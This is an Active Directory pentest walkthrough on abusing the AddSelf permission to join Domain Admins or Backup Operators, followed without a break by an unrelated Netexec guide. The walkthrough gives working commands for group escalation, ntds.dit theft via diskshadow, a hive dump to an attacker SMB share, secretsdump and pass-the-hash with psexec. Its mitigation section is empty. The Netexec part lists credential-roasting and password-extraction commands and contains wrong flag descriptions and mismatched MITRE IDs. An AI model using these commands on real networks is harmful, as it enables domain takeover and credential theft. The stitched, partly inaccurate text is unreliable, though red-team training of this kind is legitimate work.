Abusing AD-DACL: AddSelf

In this post, we will explore the exploitation of Discretionary Access Control Lists (DACL) using the AddSelf permission in Active Directory environments. By exploiting this misconfiguration, attackers can escalate privileges by adding themselves to privileged groups like Domain Admins or Backup Operators. This allows them to gain administrative control, move laterally within the network, access sensitive systems, and maintain persistence. Additionally, attackers can perform Kerberoasting attacks to steal credentials or gain control over backup data, potentially leading to a full domain takeover if the abuse is not detected and remediated.

The lab setup necessary to simulate these attacks is outlined, with methods mapped to the MITRE ATT&CK framework to clarify the associated techniques and tactics. Detection mechanisms for identifying suspicious activities linked to AddSelf attacks are also covered, alongside actionable recommendations for mitigating these vulnerabilities. This overview equips security professionals with critical insights to recognize and defend against these prevalent threats.

Table of Contents

AddSelf Permission

Prerequisites

Lab Setup – User Owns AddSelf Permission on the Domain Admins Group

Exploitation Phase I – User Owns AddSelf Permission on Domain Admins Group

Bloodhound - Hunting for Weak Permission

Method for Exploitation – Account Manipulation (T1098)

• Linux Bloody AD
• Linux Ldap_shell
• Windows PowerShell – Powerview
• Windows PowerShell – Active Directory module

Post Exploitation – Dumping hashes with Impacket

Lab Setup – User Owns AddSelf Permission on the Backup Operators Group

Exploitation Phase II – User Owns AddSelf Permission on the Backup Operators Group

Bloodhound - Hunting for Weak Permission

Method for Exploitation – Account Manipulation (T1098)

• Linux adduserstogroup tool

Post Exploitation – Dumping hashes with Impacket

Detection & Mitigation

 

AddSelf Permission

The AddSelf permission in Active Directory allows a user to add itself to the target security group. Because of security group delegation, the members of a security group have the same privileges as that group.

By adding yourself to a group and refreshing your token, you gain all the same privileges that group has.

The impact of AddSelf DACL abuse can vary based on the group that is abused. Below is a breakdown of the potential impact from an attacker’s perspective:

Prerequisites

• Windows Server 2019 as Active Directory
• Kali Linux
• Tools: Bloodhound, Net RPC, Powerview, BloodyAD, Ldap_Shell, Impacket
• Windows 10/11 – As Client

Lab Setup – User Owns AddSelf Permission on the Domain Admin Group

Create the AD Environment:

To simulate an Active Directory environment, you will need a Windows Server as a Domain Controller (DC) and a client machine (Windows or Linux) where you can run enumeration and exploitation tools.

Domain Controller:

·       Install Windows Server (2016 or 2019 recommended).

·       Promote it to a Domain Controller by adding the Active Directory Domain Services role.

·       Set up the domain (e.g., ignite.local).

 

User Accounts:

Create a standard user account named Shreya.

 

net user shreya Password@1 /add /domain

 

Assign the "AddSelf" Privilege to Shreya:

Once your AD environment is set up, you need to assign the "AddSelf" privilege to Shreya for the Domain Admins group.

1.       Open Active Directory Users and Computers (ADUC) on the Domain Controller.

2.       Enable the Advanced Features view by clicking on View > Advanced Features.

3.       Locate the Domain Admins group in the Users container.

4.       Right-click on Domain Admins and go to Properties.

 

 

Go to the Security tab, and click on Add button

 

In the “Enter the object name to select” box, type Shreya and click Check Names and click on OK.

 

Select Shreya user and in the Permissions section, and click on Advanced option.

In the Advanced security settings box, double-click on Shreya user’s permission entry.

In the Permissions section, check the box for Add/remove self as member permission rights

Apply the settings.

 

At this point, Shreya now has AddSelf rights over the Domain Admins group, meaning they can add themselves to the Domain Admins group.

 

Exploitation Phase I – User Owns AddSelf Permission on the Domain Admins Group

Bloodhound - Hunting for Weak Permission

Use BloodHound to Confirm Privileges: You can use BloodHound to verify that Shreya has the AddSelf permission on the Domain Admins group.

bloodhound-python -u shreya -p Password@1 -ns 192.168.1.48 -d ignite.local -c All

 

From the graphical representation of Bloodhound, the tester would like to identify the outbound object control for selected user where the first degree of object control value is equal to 1.

 

Thus, it has shown the Shreya User has AddSelf privilege to Domain Admin group.

 

 

Method for Exploitation – Account Manipulation (T1098)

Linux Bloody AD

It can be achieved using bloodyAD

The tester can abuse this permission by adding Shreya User into Domain Admin group and list the domain admin members to ensure that Shreya User became Domain Admin

bloodyAD --host "192.168.1.48" -d "ignite.local" -u "shreya" -p "Password@1" add groupMember "Domain Admins" "shreya"

Net RPC

Use net rpc, to list the users in the group

net rpc group members "Domain Admins" -U ignite.local/shreya%'Password@1' -S 192.168.1.48

Linux Ldap_shell

Alternatively, can be achieved using ldap_shell

ldap_shell ignite.local/shreya:Password@1 -dc-ip 192.168.1.48

 

Windows PowerShell - Powerview

The attacker can add a user to a group. This can be achieved with the Active Directory Add-DomainGroupMember (PowerView module).

powershell -ep bypass

Import-Module .\PowerView.ps1

Add-DomainGroupMember -Identity "Domain Admins" -Members shreya -Verbose

thus, from user property we can see Shreya user has become the member of domain admin.

 

Windows PowerShell - Active Directory module

The attacker can add a user to a group. This can be achieved with with the Active Directory PowerShell module.

Get-Module -Name ActiveDirectory -ListAvailable

Import-Module -Name ActiveDirectory

Add-ADGroupMember -Identity 'Domain Admins' -Members 'shreya'

 

Post Exploitation – Dumping hashes with Impacket

After exploiting AddSelf abuse, the compromised account was added to the Domain Admins group. With elevated privileges, NTLM hashes can be dumped from the Domain Controller using Impacket's secretsdump tool.

impacket-secretsdump 'ignite.local'/'shreya':'Password@1'@'192.168.1.48'

This revealed Domain Admin credentials and the krbtgt hash, enabling further attacks like Golden Ticket.

 

Lab Setup – User Owns AddSelf Permission on the Backup Operators Group

Create the AD Environment:

To simulate an Active Directory environment, you will need a Windows Server as a Domain Controller (DC) and a client machine (Windows or Linux) where you can run enumeration and exploitation tools.

Domain Controller:

·       Install Windows Server (2016 or 2019 recommended).

·       Promote it to a Domain Controller by adding the Active Directory Domain Services role.

·       Set up the domain (e.g., ignite.local).

 

User Accounts:

·       Create a standard user account named Aarav.

 

Assign the "AddSelf" Privilege to Aarav:

Once your AD environment is set up, you need to assign the "AddSelf" privilege to Aarav for the Backup Operators group.

1.       Open Active Directory Users and Computers (ADUC) on the Domain Controller.

2.       Enable the Advanced Features view by clicking on View > Advanced Features.

3.       Locate the Backup Operators group in the Users container.

4.       Right-click on Backup Operators and go to Properties.

5.        

 

·       Go to the Security tab and click on Add button.

·       In the “Enter the object name to select” box, type Aarav and click Check Names and click on OK.

·       Select Aarav user and in the Permissions section and click on Advanced option.

·       In the Advanced security settings box, double-click on Aarav user’s permission entry.

·       In the Permissions section, check the box for Add/remove self as member permission rights

·       Apply the settings.

 

 

At this point, Aarav now has AddSelf rights over the Backup Operators group, meaning they can add themselves to the Backup Operators group.

 

Exploitation Phase I – User Owns AddSelf Permission on the Backup Operators Group

Bloodhound - Hunting for Weak Permission

Use BloodHound to Confirm Privileges: You can use BloodHound to verify that Aarav has the AddSelf permission on the Backup Operators group.

bloodhound-python -u aarav -p Password@1 -ns 192.168.1.48 -d ignite.local -c All

From the graphical representation of Bloodhound, the tester would like to identify the outbound object control for selected user where the first degree of object control value is equal to 1.

 

Thus, it has shown the Aarav User has AddSelf privilege to Backup Operators group.

 

Alternatively, the above lab setup can be done using Impacket’s dacledit script

impacket-dacledit -principal aarav -target 'Backup Operators' -dc-ip 192.168.1.48 ignite.local/aarav:Password@1

 

Method for Exploitation – Account Manipulation (T1098)

Linux adduserstogroup tool

The tester can abuse this permission by adding Aarav User into Backup Operators group and list the Backup Operators members.

python3 addusertogroup.py -d ignite.local -g "Backup Operators" -a aarav -u aarav -p Password@1

Use net rpc, to list the users in the group

net rpc group members "Backup Operators" -U ignite.local/aarav%'Password@1' -S 192.168.1.48

 

Post Exploitation – Dumping hashes with Impacket

After exploiting AddSelf abuse, the compromised account was added to the Backup Operators group. With elevated privileges, NTLM hashes can be dumped from the Domain Controller using Impacket's secretsdump tool.

To test if the Aarav user has the SeBackupPrivilege, we connect to the target machine using the Evil-WinRM.  After connecting, we use the whoami /priv command to check the privileges of the Aarav user. We can observe from the image below that indeed the user Aarav has the SeBackupPrivilege and SeRestorePrivilege enabled.

evil-winrm -i 192.168.1.48 -u aarav –p "Password@1"

whoami /priv

 

In the Domain Controller, to extract NTLM hashes, the ntds.dit file and SYSTEM hive are required. Since ntds.dit remains locked while the machine is running, conventional copying methods fail. To bypass this, Diskshadow, a built-in Windows tool, is used to create a volume shadow copy of the C: drive. Instead of using manual commands in the Diskshadow shell, a Distributed Shadow File (dsh) is created to automate the process. The dsh file instructs Diskshadow to create a shadow copy of the C: drive as Z: drive. Before execution, the dsh file is converted to Windows-compatible format using unix2dos.

nano raj.dsh

set context persistent nowriters

add volume c: alias raj

create

expose %raj% z:

unix2dos raj.dsh

 

In the WinRM session, navigate to the Temp directory and upload the raj.dsh file to the target machine. Run Diskshadow with the dsh script, which executes the commands sequentially to create a shadow copy of C: as Z:.

 

cd C:\Temp

upload raj.dsh

diskshadow /s raj.dsh

Use RoboCopy to transfer the ntds.dit file from Z: to the Temp directory.

robocopy /b z:\windows\ntds . ntds.dit

With the ntds.dit file obtained; the SYSTEM hive can be extracted using the reg save command. Both files are now in the Temp directory and can be transferred to Kali Linux using the download command.

reg save hklm\system c:\Temp\system

download ntds.dit

download system

 

On the Kali Linux shell, use Impacket's secretsdump to extract hashes from the ntds.dit file and SYSTEM hive. As shown below, the Administrator account hashes were successfully extracted.

 

impacket-secretsdump -ntds ntds.dit -system system local

Use Evil-WinRM to log in as Administrator using the extracted hash, achieving privilege escalation on the Windows Domain Controller.

Alternate method of dumping hashes with Impacket

First, set up an SMB share on your attacker machine using impacket-smbserver , to store the dumped registry files using.

Run the following command on your Kali machine:

impacket-smbserver share $(pwd) -smb2support

To dump the SAM and SYSTEM hives from the target machine, use the impacket-reg tool.

impacket-reg "ignite.local"/"aarav":"Password@1"@"192.168.1.48" backup -o '\\192.168.1.11\share'

 Next, use pypykatz to extract the password hashes from the dumped SAM and SYSTEM files.

pypykatz registry --sam SAM.save SYSTEM.save

Finally, use impacket-psexec to gain a shell on the target machine as administrator user using the extracted hash, achieving privilege escalation on the Windows Domain Controller.

impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:32196b56ffe6f45e294117b91a83bf38 administrator@192.168.1.48

Detection & Mitigation

Active Directory Pentesting Using Netexec Tool: A Complete Guide

Active Directory (AD) penetration testing is an essential part of the security assessment of enterprise networks. The Netexec tool offers a wide range of capabilities for AD enumeration, credential validation, Kerberos attacks, and privilege escalation. This guide provides a detailed overview of the Netexec tool’s purpose, usage, and how to map its commands to the MITRE ATT&CK framework for Active Directory pentesting.

Table of Contents

·       Introduction to Active Directory Pentesting

·       Overview of the Netexec Tool

·       Test if an Account Exists without Kerberos

·       Testing Credentials

·       Enumerating Users

·       LDAP Queries for Specific Users

·       ASREPRoasting

·       Find Domain SID

·       Admin Count Enumeration

·       Kerberoasting

·       BloodHound Ingestor

·       User Description Enumeration

·       WhoAmI Command

·       Enumerating Group Membership

·       Group Members Enumeration

·       Machine Account Quota

·       Get User Descriptions

·       LAPS Enumeration

·       Extracting Subnet Information

·       DACL Reading

·       Get User Passwords

·       Get Unix User Password

·       Password Settings Objects (PSO)

·       Trusts Enumeration

·       Identifying Pre-Created Computer Accounts

·       Active Directory Certificate Services (ADCS)

·       Conclusion

 

Introduction to Active Directory Pentesting

Active Directory (AD) serves as the backbone for authentication and authorization in many organizations. Penetration testing AD is crucial for identifying vulnerabilities that could be exploited by attackers. Netexec is a versatile tool used for AD enumeration and exploitation. This tool assists pentesters in retrieving valuable information, testing credentials, and identifying weaknesses within an AD environment.

Overview of the Netexec Tool

The Netexec tool is primarily used for Active Directory enumeration and exploitation via LDAP. It allows pentesters to test the existence of accounts, authenticate using hashes, enumerate users and groups, and even exploit certain vulnerabilities in AD services. The tool operates via simple command-line syntax and provides a variety of options to customize the attack or enumeration process.

The basic syntax for Netexec is:

nxc ldap <target> -u <username> -p <password> <options>

Where:

• <target>: The IP address or hostname of the LDAP server.
• <username>: The username for authentication.
• <password>: The password (or NTLM hash) for authentication.
• <options>: Specific attack or enumeration options to be performed.

 

Test if an Account Exists without Kerberos

Purpose:
This command is used to check whether an account exists within Active Directory without relying on the Kerberos protocol, which may be disabled or unavailable.

nxc ldap 192.168.1.48 -u "user.txt" -p '' -k

Explanation:

• -u "user.txt": List of usernames to check.
• -p '': No password is supplied (since it's only testing account existence).
• -k: Disables Kerberos protocol usage.

MITRE ATT&CK Mapping:

T1071 - Application Layer Protocol: LDAP (This is a reconnaissance activity using LDAP).

Testing Credentials

Purpose:
This command tests a user’s credentials to validate whether they are correct, either with a plaintext password or an NTLM hash.

Using username and password:

nxc ldap 192.168.1.48 -u raj -p Password@1

Using NTLM hash:

nxc ldap 192.168.1.48 -u raj -H 64FBAE31CC352FC26AF97CBDEF151E03

Explanation:

• -u raj -p Password@1: Tests the raj user with the given password.
• -H <hash>: Uses an NTLM hash instead of a plaintext password.

MITRE ATT&CK Mapping:

T1110 - Brute Force (Credential testing using hashes).

 

Enumerating Users

Purpose:
To retrieve all user accounts in the Active Directory domain. This is a key reconnaissance step to identify potential targets for further attacks.

All users:

nxc ldap 192.168.1.48 -u raj -p Password@1 –users

Active users:

nxc ldap 192.168.1.48 -u raj -p Password@1 --active-users

 

Explanation:

• --users: Retrieves all users in the directory.
• --active-users: Filters the result to only active users (i.e., not disabled).

MITRE ATT&CK Mapping:

T1087 - Account Discovery.

 

LDAP Queries for Specific

Purpose:
Queries LDAP for specific user attributes, such as their sAMAccountName.

Query a specific user:

nxc ldap 192.168.1.48 -u raj -p Password@1 --query "(sAMAccountName=aarti)" ""

Query all users:

nxc ldap 192.168.1.48 -u raj -p Password@1 --query "(sAMAccountName=*)" ""

Explanation:

• --query "(sAMAccountName=aarti)": Queries for a user with the sAMAccountName "aarti".
• --query "(sAMAccountName=*)": Retrieves all users in the AD environment.

MITRE ATT&CK Mapping:

T1087 - Account Discovery.

 

ASREPRoasting

Purpose:
ASREPRoasting exploits accounts that do not require Kerberos pre-authentication to extract service ticket hashes, which can then be cracked offline.

Without Authentication:

nxc ldap 192.168.1.48 -u yashika -p '' --asreproast output.txt

 

With a list of users:

nxc ldap 192.168.1.48 -u "users.txt" -p '' --asreproast output.txt

Explanation:

• --asreproast output.txt: Extracts ASREP (Kerberos Pre-Authentication) hashes and saves them to output.txt.
• --dns-server: Specifies the DNS server to resolve domain names.

MITRE ATT&CK Mapping:

T1558.001 - Kerberos Ticket Extraction.

 

Find Domain SID

Purpose:
Retrieves the Domain Security Identifier (SID), which is a unique identifier for the domain.

nxc ldap 192.168.1.48 -u raj -p Password@1 --get-sid

MITRE ATT&CK Mapping:

T1071 - Application Layer Protocol: LDAP. The Domain SID is important for NTLM relay and privilege escalation attacks.

 

Admin Count Enumeration

Purpose:
Identifies high-privilege accounts such as Domain Admins by checking the AdminCount attribute.

nxc ldap 192.168.1.48 -u raj -p Password@1 --admin-count

MITRE ATT&CK Mapping:

T1087 - Account Discovery.

 

Kerberoasting

Purpose:
Kerberoasting extracts service account hashes by requesting service tickets for accounts with SPNs (Service Principal Names).

nxc ldap 192.168.1.48 -u raj -p Password@1 --kerberoasting hash.txt

MITRE ATT&CK Mapping:

T1558.001 - Kerberos Ticket Extraction.

 

BloodHound Ingestor

Purpose:
The BloodHound ingestor is used to collect data for use in BloodHound, a tool for mapping AD attack paths.

nxc ldap 192.168.1.48 -u raj -p Password@1 --bloodhound --collection All

MITRE ATT&CK Mapping:

T1087 - Account Discovery.

 

User Description Enumeration

Purpose:
Enumerates the user descriptions for identifying potential sensitive information.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M user-desc

MITRE ATT&CK Mapping:

T1087 - Account Discovery.

 

WhoAmI Command

Purpose:
The whoami command retrieves the current authenticated user in the session.

 nxc ldap 192.168.1.48 -u raj -p Password@1 -M whoami

MITRE ATT&CK Mapping:

T1087 - Account Discovery.

 

Enumerating Group Membership

Purpose:
This command is used to enumerate the groups that a specific user is a member of. This helps identify high-privilege groups and lateral movement opportunities.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M groupmembership -o USER="ankur"

Explanation:

• -M groupmembership: Enumerates the groups that the specified user is a member of.
• -o USER="ankur": Specifies the username for which group membership is being queried.

MITRE ATT&CK Mapping:

• T1087 - Account Discovery.
• T1075 - Pass the Hash (can be used to escalate privileges within group memberships).

 

Group Members Enumeration

Purpose:
This command allows you to enumerate the members of a specific group, such as "Domain Admins" or "Domain Users," which can reveal key targets for attacks.

Enumerating members of "Domain Users

nxc ldap 192.168.1.48 -u raj -p Password@1 -M group-mem -o GROUP="Domain users"

Enumerating members of "Domain Admins":

nxc ldap 192.168.1.48 -u raj -p Password@1 -M group-mem -o GROUP="Domain admins"

Explanation:

• -M group-mem: Enumerates the members of a specific group.
• -o GROUP="Group Name": Specifies the group to query (e.g., "Domain Admins").

MITRE ATT&CK Mapping:

T1087 - Account Discovery.

 

Machine Account Quota

Purpose:
This command checks the quota for creating machine accounts in Active Directory, which can be useful for identifying potential opportunities for creating rogue machines or bypassing group policies.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M maq

MITRE ATT&CK Mapping:

T1077 - Windows Admin Shares (creating machine accounts to gain access).

 

Get User Descriptions

Purpose:
This command enumerates the descriptions associated with user accounts, which can sometimes contain valuable information such as roles, responsibilities, or even credentials.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-desc-users

MITRE ATT&CK Mapping:

T1087 - Account Discovery.

 

LAPS Enumeration

Purpose:
LAPS (Local Administrator Password Solution) is a Microsoft solution that randomizes and stores local administrator passwords. This command retrieves the LAPS password for local administrator accounts.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M laps

MITRE ATT&CK Mapping:

• T1087 - Account Discovery.
• T1110 - Brute Force (to brute force local administrator passwords).

 

Extracting Subnet Information

Purpose:
This command retrieves subnet information, which can help in identifying the network layout and plan further attacks such as lateral movement or exploiting vulnerable machines.

nxc ldap "192.168.1.48" -u "raj" -p "Password@1" -M get-network

MITRE ATT&CK Mapping:

T1010 - Application Layer Protocol: SMB.

DACL Reading

Purpose:
The DACL (Discretionary Access Control List) reading command is used to view access control lists for specific AD objects, which can help identify overly permissive access or misconfigurations.

nxc ldap 192.168.1.48 -u raj -p Password@1 --kdcHost ignite.local -M daclread -o TARGET=Administrator ACTION=read

Explanation:

• -M daclread: Reads the DACL of the specified target.
• -o TARGET=Administrator ACTION=read: Specifies the target object (e.g., "Administrator") and the action to be performed (read the DACL).

MITRE ATT&CK Mapping:

T1074 - Data Staged (collecting information about DACLs for privilege escalation).

Get User Passwords

Purpose:
This command retrieves user passwords, which can be critical for offline cracking or further attacks.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-userPassword

MITRE ATT&CK Mapping:

T1003 - OS Credential Dumping.

Get Unix User Password

Purpose:
This command retrieves passwords for Unix-based systems if integrated with AD. It is useful for assessing whether Unix accounts are vulnerable to attacks such as Pass-the-Hash.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-unixUserPassword

MITRE ATT&CK Mapping:

T1003.003 - OS Credential Dumping: Unix.

Password Settings Objects (PSO)

Purpose:
This command retrieves the Password Settings Objects (PSO), which are used to define password policies in AD. If misconfigured, these could allow an attacker to bypass certain password requirements.

nxc ldap 192.168.1.48 -u administrator -p Ignite@987 -M pso

MITRE ATT&CK Mapping:

T1071 - Application Layer Protocol: LDAP (retrieving password policies).

Trusts Enumeration

Purpose:
Enumerates trust relationships between different domains, which can be useful for lateral movement and attacking interconnected domains.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M enum_trusts

MITRE ATT&CK Mapping:

T1076 - Remote Desktop Protocol (RDP) (used for lateral movement once trust relationships are identified).

Identifying Pre-Created Computer Accounts

Purpose:
This command identifies pre-created computer accounts that could be used for bypassing security controls or creating rogue machines on the network.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M pre2k

MITRE ATT&CK Mapping:

T1077 - Windows Admin Shares.

Active Directory Certificate Services (ADCS)

Purpose:
ADCS can be exploited to issue certificates for unauthorized machines. This command checks for misconfigurations or exploitable configurations within ADCS.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M adcs

MITRE ATT&CK Mapping:

T1553.003 - Application Layer Protocol: SMB.

Conclusion

The Netexec tool offers a powerful suite of features for AD pentesting. It can help identify misconfigurations, discover critical attack paths, and validate vulnerabilities. This tool plays a crucial role in the process of assessing the security posture of an Active Directory environment and can be used for both red team operations and vulnerability assessments.

By understanding the purpose and usage of each Netexec command, penetration testers can effectively map their attacks to the MITRE ATT&CK framework, ensuring that the assessment is thorough and aligned with industry-standard tactics, techniques, and procedures (TTPs).